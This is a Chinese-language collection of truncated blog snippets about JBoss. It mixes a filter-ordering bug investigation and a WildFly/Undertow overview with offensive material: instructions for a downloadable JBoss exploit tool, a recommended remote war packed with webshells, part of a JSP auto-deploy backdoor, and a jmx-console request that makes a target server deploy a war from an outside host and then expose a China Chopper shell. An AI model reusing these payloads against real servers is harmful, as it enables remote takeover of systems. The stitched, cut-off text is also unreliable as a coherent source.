在之前调试Tomcat的时候就已经发现了Tomcat存在此问题Tomcat7.0.30以上全局Filter加载顺序问题，今天调试Jboss6的时候也发现了同样的问题。原因很简单，Jboss沿用了Tomcat的内核，Servlet容器那块核心代码是使用的Tomcat源码。 既然知道问题所在那么现在的问题就是要找到之前调试Tomcat出问题的类和方法。根据我之前的记录，Tomcat 的Filter加载问题出现的位置大约是在“org.apache.catalina.core.ApplicationFilterRegistration.java的版本变动(修改74-78行、103-107行)：Tomcat7.0.29的isMatchAfter判断的顺序反了。所以想办法把 顺序弄回去就行了。把context.addFilterMapBefore(filterMap);”。上一次我是改的catalina.jar的核心源码，所以在Jboss6目录搜索catalina.jar，发现没找到。搜catalina、Tomcat同样没找到对应的jar。估计是Jboss的开发人员把jar名改了，于是想写个递归遍历Jboss下所有的jar里面带有ApplicationFilterRegistration类或addFilterMapBefore方法的所有文件。 实现目录搜索jar和内容： package jar

免责声明：本站提供的所有工具及代码仅供交流学习，不得用于商业或黑客行为。 下载地址:Jboss漏洞利用工具.jar 链接: 密码: ucdl 功能说明: 安装jdk并配置好环境变量,然后填好参数先点获取即可，成功后会返回"请求成功."。 1、JMX/EJBInvokerServlet: host写IP或域名:127.0.0.1/p2j.cn port必填,如:8080 2、HtmlAdaptor: host写URL地址:http://localhost:8080 port不需填写 3、war包推荐使用:http://javaweb.org/is.war,is.war里面带有几个版本的一句话和一个cmd.jsp (如:http://xxx.com/is/?cmd.jsp?pwd=023&cmd=ls)如果使用自己的war包, cmd功能需要默认配置(/is/cmd.jsp)war包只自带了mysql数据库所需要的jar, 连接oracle等其他数据库需要自己添加jar包 截图-JMX/EJBInvokerServlet: 截图-HtmlAdaptor: 核心源码： package org.javaweb.jboss; import java.io.BufferedReader; import java.io.ByteArrayOutputStrea

Jboss官网最新版本是Jboss7，以前没注意原来WildFly 8就是Jboss8.Jboss那货改名了。 Jboss下载地址 WildFly下载地址 高性能非阻塞Web 服务器Undertow 概述 WildFly 8 包含了一个全新的Web服务器（Undertow），WildFly 8 默认的Web服务器为Undertow。一句话概括什么是Undertow - 高性能非阻塞 Web 服务器。Undertow 主要有以下几个特点： 轻量化 - Undertow 是一个Web 服务器，但它不像传统的Web 服务器有容器的概念，它由两个核心jar包组成，使用API加载一个Web应用可以使用小于10MB的内存 HTTP Upgrade 支持 - 设计WildFly时一个重要的考虑因素是在云环境中减少端口数量的需求。在云环境中，一个系统可能运行了几百个甚至几千个WildFly实例。基于HTTP使用HTTP Upgrade可以升级成多种协议，Undertow提供了复用这些协议的能力。 Web Socket 支持 - 对Web Socket的完全支持，用以满足Web应用现在面对巨大数量的客户端，以及对JSR-356规范的支持 Servlet 3.1 的支持 - Undertow支持Servlet 3.1，提供了一个机会来构建一个超越Servlet规范、对开发人员非常友好的系统。 可嵌套性

在乌云社区发现有人发了一个Jboss的自动部署war的后门求此后门的利用方法。 <%@page import="java.io.*, java.util.*, sun.misc.BASE64Decoder"%> <% String PJdpj = ""; String pIGx = ""; String RSVw = System.getProperty("jboss.server.home.dir"); if (request.getParameter("pUBYyDsT") != null) { try { PJdpj = request.getParameter("pUBYyDsT"); pIGx = request.getParameter("oAEICWIo"); byte[] rFPE = new BASE64Decoder().decodeBuffer(PJdpj); String MfNJU = RSVw + "/deploy/" + pIGx + ".war"; FileOutputStream twkH

请求：http://192.168.0.113:8080/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://www.ahack.net/iswin.war 成功后访问：http://192.168.0.113:8080/iswin/index.jsp 菜刀连接（默认包含index.jsp、index.jspx、index.jspf、cmd.jsp三个shell）。 测试版本：jboss-6.1.0.Final。 iswin.war